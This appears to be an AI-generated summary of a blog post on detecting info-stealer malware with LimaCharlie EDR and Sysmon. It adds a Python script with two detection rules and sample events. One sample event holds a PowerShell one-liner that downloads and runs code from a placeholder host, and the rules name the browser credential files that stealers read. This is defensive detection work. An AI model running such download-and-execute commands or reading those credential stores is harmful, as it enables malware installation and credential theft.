Aspect | Details |
---|---|
Info-Stealer Overview | Lumma, Raccoon, and RedLine are commodity info-stealers that harvest the credentials browsers such as Chrome and Edge save on disk and exfiltrate them for account takeover. |
Lumma Infection Chain | A fake CAPTCHA page instructs the victim to paste a command into the Windows Run dialog; this launches PowerShell, which fetches and executes the stealer payload. The stealer then reads the browsers' stored credential databases (the Chromium "Login Data" files) directly from disk. |
Simulation Setup | Attacker side: Kali Linux with Meterpreter payloads. Defender side: LimaCharlie EDR agent plus Sysmon on the Windows victim, with file auditing and detection rules configured for the browser credential paths. |
File Auditing | Enabled through Windows Group Policy (Advanced Audit Policy, Object Access > Audit File System) together with a SACL on the Chrome and Edge credential paths, so that each read of those files produces Security Event ID 4663 ("An attempt was made to access an object"). The policy alone logs nothing for these files; the SACL on the path is what makes 4663 fire. |
Registry Monitoring | Sysmon configured (RegistryEvent, Event ID 13) to record writes to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, the history Explorer keeps of commands typed into the Run dialog, so PowerShell or CMD launched this way leaves a log entry even if the process itself is short-lived. |
Detection Rules | (1) Suspicious Browser Credential Access: alert on Event ID 4663 when the accessing process is not the browser itself (e.g. not chrome.exe or msedge.exe). (2) Shell Invoked via Run: alert when a RunMRU write (Sysmon Event ID 13) carries a powershell or cmd command. |
Result | Combining EDR telemetry, file-access auditing, and the two tailored rules surfaced the info-stealer behaviours exercised in the simulation: credential-file reads by a non-browser process and shells launched from the Run dialog. |
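Both detection rules from the table, reduced to plain Python and run over constructed events (added example; this is not code from the article, LimaCharlie or Sysmon). The field names mirror Security Event ID 4663 (ProcessName, ObjectName) and Sysmon Event ID 13 (TargetObject, Details); the credential-file paths, the RunMRU layout with its trailing "\1" suffix, and the sample SIDs, users and URLs are assumptions made for the example, not captured telemetry.

```python
"""Rule 1 (non-browser process touching a browser credential file) and
Rule 2 (powershell/cmd typed into the Run dialog) over constructed events.
Added example, not code from the article, LimaCharlie or Sysmon."""
import re
import shlex

# Rule 1 assumptions: Chromium-family credential store under the default
# profile layout; only the browser binaries themselves may legitimately read it.
CREDENTIAL_FILE_PATTERNS = [
    re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", re.IGNORECASE),
    re.compile(r"\\Microsoft\\Edge\\User Data\\[^\\]+\\Login Data$", re.IGNORECASE),
]
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe"}

# Rule 2 assumptions: Explorer's Run-dialog history lives under RunMRU; each
# entry is a value (a, b, c, ...) whose data is the typed command plus a "\1"
# suffix, and the MRUList value holds only the ordering letters.
RUNMRU_KEY = re.compile(r"\\Explorer\\RunMRU\\(?P<value>[^\\]+)$", re.IGNORECASE)
SHELL_NAMES = {"powershell", "pwsh", "cmd"}


def _basename(path):
    """Last path component, unquoted and lower-cased."""
    return path.rsplit("\\", 1)[-1].strip('"').lower()


def rule_browser_credential_access(event):
    """Alert on 4663 when a non-browser process accesses a credential file."""
    if event.get("EventID") != 4663:
        return None
    obj = event.get("ObjectName", "")
    if not any(p.search(obj) for p in CREDENTIAL_FILE_PATTERNS):
        return None
    proc = _basename(event.get("ProcessName", ""))
    if proc in BROWSER_PROCESSES:
        return None
    return {"rule": "Suspicious Browser Credential Access", "process": proc, "object": obj}


def rule_shell_invoked_via_run(event):
    """Alert on Sysmon 13 when a RunMRU entry starts with powershell/pwsh/cmd."""
    if event.get("EventID") != 13:
        return None
    m = RUNMRU_KEY.search(event.get("TargetObject", ""))
    if not m or m.group("value").lower() == "mrulist":
        return None
    command = event.get("Details", "")
    if command.endswith("\\1"):          # strip Explorer's "\1" suffix
        command = command[:-2]
    try:
        tokens = shlex.split(command, posix=False)   # keep quoted paths intact
    except ValueError:                                # unbalanced quotes
        tokens = command.split()
    if not tokens:
        return None
    name = _basename(tokens[0])
    if name.endswith(".exe"):
        name = name[:-4]
    if name not in SHELL_NAMES:
        return None
    return {"rule": "Shell Invoked via Run", "shell": name, "command": command}


RULES = (rule_browser_credential_access, rule_shell_invoked_via_run)


def run_detections(events):
    """Apply every rule to every event; return the alerts in event order."""
    alerts = []
    for event in events:
        for rule in RULES:
            hit = rule(event)
            if hit is not None:
                alerts.append(hit)
    return alerts


# Constructed sample events (not real telemetry); SID, user and URL are made up.
_RUNMRU = r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
SAMPLE_EVENTS = [
    # Chrome reading its own store: expected, no alert.
    {"EventID": 4663,
     "ProcessName": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ObjectName": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # PowerShell (the stealer's loader) reading Edge's store: alert.
    {"EventID": 4663,
     "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ObjectName": r"C:\Users\victim\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    # Run-dialog history entry for a pasted one-liner: alert.
    {"EventID": 13, "TargetObject": _RUNMRU + r"\a",
     "Details": 'powershell -w hidden -c "iwr http://example.invalid/x | iex"\\1'},
    # MRUList ordering update and a notepad launch: no alert.
    {"EventID": 13, "TargetObject": _RUNMRU + r"\MRUList", "Details": "ab"},
    {"EventID": 13, "TargetObject": _RUNMRU + r"\b", "Details": "notepad\\1"},
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

Two caveats carry over to a production rule. Rule 1 allow-lists by image name, which a stealer defeats by copying itself to chrome.exe, so the real rule should also check the image path or Authenticode signer. Rule 2 only sees what Sysmon records: the RunMRU key must be in the RegistryEvent include list, and 4663 only fires once the SACL is on the credential files, so both configurations should be verified before trusting an absence of alerts.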
Read full article: https://medium.com/@atlas64/hunting-for-info-stealer-malware-limacharlie-edr-and-sysmon-c5c621fea74a
Disclaimer: The above summary has been generated by an AI language model